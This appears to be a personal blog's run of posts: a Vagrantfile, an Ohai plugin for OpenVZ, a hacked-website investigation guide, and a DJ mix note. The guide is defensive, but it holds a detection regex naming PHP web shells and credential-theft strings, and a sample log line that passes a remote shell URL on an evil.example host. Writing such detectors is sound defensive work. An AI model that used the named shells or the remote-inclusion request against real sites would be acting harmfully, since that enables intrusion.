My Vagrantfile

This is the Vagrantfile I am using for my development boxes at home and work. It determines how much RAM is available and how much I want to allocate, detects how many CPUs are available, and configures the VM for me. I use NFS for shared folders. Finally, I am starting to use vagrant-hostsupdater to keep my host machine's hosts file current.

I would love to make that more dynamic, based on the Apache vhosts I have configured in the VM. Something to work towards I suppose.

The base box was provisioned using Packer and Chef.

# -*- mode: ruby -*-
# vi: set ft=ruby :

# Using the following plugins:
# `vagrant plugin install vagrant-hostsupdater`

PARAMS = {
    'projects_path' => "#{ENV['HOME']}/Development/projects",
    'hostname' => "#{ENV['USER']}-web",
    'ip' => '',
    'max_ram' => 3 # divisor: 4 = 1/4 of the system ram, 3 = 1/3, 2 = 1/2
}

# Vagrantfile API/syntax version. Don't touch unless you know what you're doing!
VAGRANTFILE_API_VERSION = "2"

Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
  config.vm.box = "ns-centos65"
  config.vm.host_name = PARAMS['hostname']

  # Setup network
  config.vm.network :forwarded_port, guest: 22, host: 2222, id: "ssh", disabled: true
  config.vm.network :forwarded_port, guest: 22, host: 2210, auto_correct: true # ssh
  config.vm.network :forwarded_port, guest: 80, host: 8010 # http
  config.vm.network :forwarded_port, guest: 3000, host: 3000 # rails/webrick
  config.vm.network :forwarded_port, guest: 8080, host: 8080 # xhprof gui
  config.vm.network "private_network", ip: PARAMS['ip']

  # Setup synced folders
  config.vm.synced_folder PARAMS['projects_path'], "/var/www/projects", nfs: true
  # Setup /etc/hosts on host
  config.hostsupdater.aliases = %w(rlug.local roylindauer.local trap.local estimator.local)

  # Setup VM params based on host resources
  host = RbConfig::CONFIG['host_os']

  # Provider-specific configuration so you can fine-tune various
  # backing providers for Vagrant. These expose provider-specific options.
  # Example for VirtualBox:
  config.vm.provider "virtualbox" do |vb|
    # Give the VM a share of system memory & access to all cpu cores on the host
    if host =~ /darwin/
      cpus = `sysctl -n hw.ncpu`.to_i
      # sysctl returns Bytes and we need to convert to MB
      mem = `sysctl -n hw.memsize`.to_i / 1024 / 1024 / PARAMS['max_ram']
    elsif host =~ /linux/
      cpus = `nproc`.to_i
      # meminfo shows KB and we need to convert to MB
      mem = `grep 'MemTotal' /proc/meminfo | sed -e 's/MemTotal://' -e 's/ kB//'`.to_i / 1024 / PARAMS['max_ram']
    else # sorry Windows folks, I can't help you
      cpus = 2
      mem = 1024
    end

    vb.gui = true
    vb.name = "Web_Development_LAMP"
    vb.customize ["modifyvm", :id, "--memory", mem]
    vb.customize ["modifyvm", :id, "--cpus", cpus]
    vb.customize ["modifyvm", :id, "--natdnshostresolver1", "on"]
    vb.customize ["modifyvm", :id, "--natdnsproxy1", "on"]
  end
end



Ohai Plugin for OpenVZ VMs to get public IP Address

Media Temple uses the OpenVZ virtualization system and I have quite a few Media Temple servers under Chef management. The one thing that has made management difficult is that, by default, ohai returns the wrong (local) address as the default IP during a Chef run, which means I cannot run knife to execute commands from my workstation.

For example, when I run knife node show  I get the following:

$ knife node show

Node Name:
Environment: production

Kinda sucks. If I try to execute on all of my MT servers, say something like knife ssh 'tags:mt' 'sudo chef-client', I will get a ton of failed connection errors because it is trying to connect to that local address.

The solution is to get ohai to return the correct IP. OpenVZ has virtual interfaces and the actual public IP is assigned to them, while the main interface, eth0, is given a local address. This ohai plugin will retrieve the correct IP.

provides "ipaddress"
require_plugin "#{os}::network"
require_plugin "#{os}::virtualization"

if virtualization["system"] == "openvz"
  network["interfaces"]["venet0:0"]["addresses"].each do |ip, params|
    if params["family"] == "inet"
      ipaddress ip
    end
  end
end

Put this in your ohai plugins directory for chef: /etc/chef/plugins/openvz.rb and when chef runs, it will get the correct IP address.

Now when I run knife node show, I get the correct IP:

$ knife node show

Node Name:
Environment: production


What to do when your website is hacked/exploited

So your website has been “hacked”? You load your website in your browser and are redirected to some spammer's website, or maybe you Googled yourself (naughty) and found a few thousand indexed pages for knock-off Prada gear? OK, so how do you fix this, and more importantly, how do you learn how they did it so you can defend against it later?


Secure the scene

The first thing I do is take a snapshot of the hacked web site. I want the entire webroot, and the access and error logs so that I can review them.

cd /var/www/vhosts/
tar -zcf 20150101-siteexploit-evidence.tar httpdocs logs/access_log* logs/error_log*
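One extra step worth considering: checksum the snapshot so you can later show the evidence was not altered. A sketch (the stand-in archive line exists only so the example runs on its own):

```shell
tarball=20150101-siteexploit-evidence.tar
# Stand-in archive, purely so this sketch is self-contained.
[ -f "$tarball" ] || tar -cf "$tarball" --files-from /dev/null

# Record the checksum; store the .sha256 file somewhere off the server.
sha256sum "$tarball" > "$tarball.sha256"

# Later, verify the archive is untouched:
sha256sum -c "$tarball.sha256"
```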

At this point I want to either shut down the web server, or just restore the site and get back to the investigation. I would shut down if I felt the exploit was serious enough to warrant more serious action. Otherwise, just restore from backup, or check out your repo, whatever you gotta do.

Here is where the fun begins. Try to figure out when, and how, your site was exploited. First things first, take an inventory of the scene.

Looking for clues to how the site was hacked

Run the last command for suspicious logins. “last” will show a listing of last logged in users. Maybe someone SSH’d into your machine (hopefully not!) or logged in via FTP. If you see a suspicious IP in last then chances are someone has initiated the attack by simply uploading a file through FTP or SCP.
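A quick way to slice up the login history (assuming `last -i`, so the source shows as a numeric IP in the host column):

```shell
# Capture login history once; wtmp rotates, so older entries may live in
# /var/log/wtmp.1 (read them with `last -f /var/log/wtmp.1`).
last -i > logins.txt 2>/dev/null || true

# Count logins per source address - anything you don't recognize
# deserves a closer look.
awk '{print $3}' logins.txt | grep -E '^[0-9.]+$' | sort | uniq -c | sort -rn
```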

Check for modified files. If you are seeing files modified recently that you did not edit yourself they are suspect and probably contain malicious code. Check the modification timestamp on those files. That date will be useful when looking through the access logs. If you know that you have not made changes to your site in {n} days use that as the basis for your search:

find . -type f -mtime -{n} -print > modified_files.txt

Replace {n} with an actual number.
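Once you have a candidate list, the full timestamps help cluster the changes into a single attack window. Assuming GNU find (`-printf` is a GNU extension):

```shell
# List recently modified files (here: last 7 days) with their
# modification times, so the changes can be grouped into one window.
find . -type f -mtime -7 -printf '%TY-%Tm-%Td %TH:%TM  %p\n' | sort > modified_with_times.txt
head modified_with_times.txt
```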

Scan all files in the webroot for common exploit signatures. If you find a lot of eval(gzinflate then you can almost be certain that it is malicious code. A good rule of thumb is eval is “evil”, except when it’s not (protip: it usually is).

grep -Fir 'gzinflate(base64_decode' --include='*.php' . > suspect_files.txt

Here is a bash script that checks for common exploits:

pattern='r0nin|m0rtix|upl0ad|r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|vandal|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|Webshell|get_pass|PhpConfigSpy|SubhashDasyam|(eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11))|earnmoneydo'
searchpath='/var/www/vhosts'
grep "$pattern" "$searchpath" -roE --include='*.php*' | sort

That will check all .php files under /var/www/vhosts for common php shells and exploits.

Collect Evidence

Ok, so you have a date, maybe a date range, and a list of potentially suspect files. With that information it’s time to start looking at logs. The goal is to be able to determine when, and potentially how, the attacker exploited the site.

There are 5 common vulnerabilities attackers exploit.

  1. Remote code execution
  2. SQL injection
  3. Format string vulnerabilities
  4. Cross Site Scripting (XSS)
  5. Username enumeration

All web developers should be familiar with the OWASP top 10 too. Anyways, you want to look for signs of those types of attacks. I scan my access logs and typically check for the following things:

  • Check for POST requests to suspicious locations, such as a file upload location, or other areas that are not accessed directly (like an includes directory, or theme directory).
  • Check for GET or POST requests with a remote URL as a parameter, such as /page/?url=
  • Check for GET or POST requests to the files you found when scanning the site for malicious code
  • Check for very odd query parameters in GET and POST requests
  • You should know your site, check for requests that are just out of the ordinary
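A few grep one-liners along those lines. The log path and URL patterns here are examples, not from any real site, and the two sample log lines are fabricated so the commands have something to match:

```shell
mkdir -p logs
# Two fabricated combined-log lines, purely for illustration.
cat > logs/access_log <<'EOF'
203.0.113.50 - - [01/Jan/2015:03:12:01 -0800] "POST /themes/foo/upload.php HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2015:10:00:00 -0800] "GET /page/?url=http://evil.example/shell.txt HTTP/1.1" 200 1024
EOF

# POSTs to paths that should never receive a POST (e.g. a theme dir):
grep '"POST /themes/' logs/access_log

# Requests that pass a remote URL as a query parameter:
grep -E '"(GET|POST) [^ ]*\?[^ ]*url=https?://' logs/access_log
```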

When you find suspicious entries in your logs, take note of the IP addresses. Scan your logs for all entries for that IP, you might be able to find when the exploit occurred. If you do, you then know the requests that might have been the culprit, or at least have a date range for when the exploit took place. Check the logs around that date range. It could be that the attacker initiated the exploit through a proxy, and finished the work through another one.
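Pulling every request from one suspect IP into a single timeline can be done like this (the IP and the sample log lines are made up for illustration; point the grep at your real access logs):

```shell
mkdir -p logs
# Fabricated sample entries, purely for illustration.
cat > logs/access_log <<'EOF'
203.0.113.50 - - [01/Jan/2015:03:11:58 -0800] "GET /wp-login.php HTTP/1.1" 200 1420
203.0.113.50 - - [01/Jan/2015:03:12:01 -0800] "POST /upload.php HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2015:10:00:00 -0800] "GET / HTTP/1.1" 200 2048
EOF

badip='203.0.113.50'  # an IP you flagged as suspicious
# Collect that IP's requests across rotated logs into one timeline.
grep -h "^$badip " logs/access_log* | sort > attacker_timeline.txt
cat attacker_timeline.txt
```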

Take Action

I recently had a clients website get exploited. The attacker modified dozens of PHP scripts, uploaded about 30 different PHP shells, and just generally made a mess of things. Most of the modified files had the same modification timestamp, so using that I checked the logs and found that someone had been crafting POSTs to a file upload plugin for a wysiwyg editor. Looking into that plugin, I found that they were able to upload a PHP shell. I quickly removed the plugin, restored the modified files, and removed all of the uploaded PHP shells.

The exploit showed me that the security of the website and server was severely lacking. Some fundamental security precautions were not implemented: script execution was allowed in a user upload directory, and that should just never happen. I set up rules to disable script execution in specific directories, disabled direct access to other directories, and secured file and directory permissions.

I also set up fail2ban on the client's server. Fail2ban is great for monitoring logs, looking for certain signatures, and then banning the offending IP. You can define other actions to take, such as emailing you, but I just want to block their access to the server, so: ban via iptables. I noticed that this particular attacker was sending a lot of POST requests at the same time, so I set up a fail2ban filter to handle a POST flood. You will probably want to set up filters for dealing with failed login attempts to the server, and to address any of the other suspicious activity you found in your logs.
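For reference, a postflood setup along these lines. The filter name, thresholds, and log path are examples, not my exact config; on a real server the filter goes in /etc/fail2ban/filter.d/ and the jail section in jail.local (files are written to the current directory here just so the sketch is self-contained):

```shell
# Filter: match any POST request in an Apache access log.
# Real location: /etc/fail2ban/filter.d/postflood.conf
cat > postflood.conf <<'EOF'
[Definition]
failregex = ^<HOST> .*"POST .*
ignoreregex =
EOF

# Jail: ban an IP for an hour if it fires more than 30 POSTs in 60s.
# Real location: a [postflood] section in /etc/fail2ban/jail.local
cat > jail-postflood.local <<'EOF'
[postflood]
enabled  = true
port     = http,https
filter   = postflood
logpath  = /var/www/vhosts/*/logs/access_log
maxretry = 30
findtime = 60
bantime  = 3600
EOF
```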

You will definitely want to update your CMS and update any 3rd party dependencies. Doing that alone will go a long way towards keeping your site exploit free.

Wrap up

Security is hard. It’s a never ending battle. And you will never, ever, make your site 100% safe and secure. The best thing to do is have a recovery plan. When your site is exploited can you recover? If you can answer yes to that, you are in a good place.

Best Laid Plans

I had originally planned to play this set for Zombie Crawl, but ended up changing gears once the party got going. I liked this one, though, so here we are.

[update 11/19]

This mix has been featured on the Source Tribe podcast.

Check it out: &

Somehow this thing has gotten over 7000 views in the last 2 days! Crazy